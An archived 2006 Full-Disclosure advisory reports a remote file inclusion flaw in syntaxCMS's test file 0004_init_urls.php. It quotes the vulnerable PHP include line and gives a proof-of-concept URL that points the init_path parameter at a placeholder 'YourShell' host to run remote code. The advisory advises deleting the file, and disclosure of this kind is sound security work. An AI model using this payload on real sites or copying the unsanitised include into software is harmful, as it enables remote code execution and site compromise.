Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) iyzi Forum s1 b2 (tr) SQL Injection Vulnerability ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability [SA22075] Web-News "content_page" File Inclusion Vulnerability [Full-disclosure] Local File Inclusion : Kietu From:God Of Death (G.O.D) <mohajali2k4_(at)_gmail.com> Date:25.09.2006Subject:[Full-disclosure] Remote File Include in syntaxCMS Remote File Include in syntaxCMS Vulnerable File: 0004_init_urls.php Vulnerable Code: 1 <?php 2 include_once( $init_path . '/init.urls.php' ); 3 ?> PoC: http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init _path=http://YourShell?& Solution: Remove This File...it's not needed...just used for tests ____ Found by MoHaJaLi Greetz to Eddy_BAck0o ____ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
iyzi Forum s1 b2 (tr) SQL Injection Vulnerability
ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability
[SA22075] Web-News "content_page" File Inclusion Vulnerability
[Full-disclosure] Local File Inclusion : Kietu
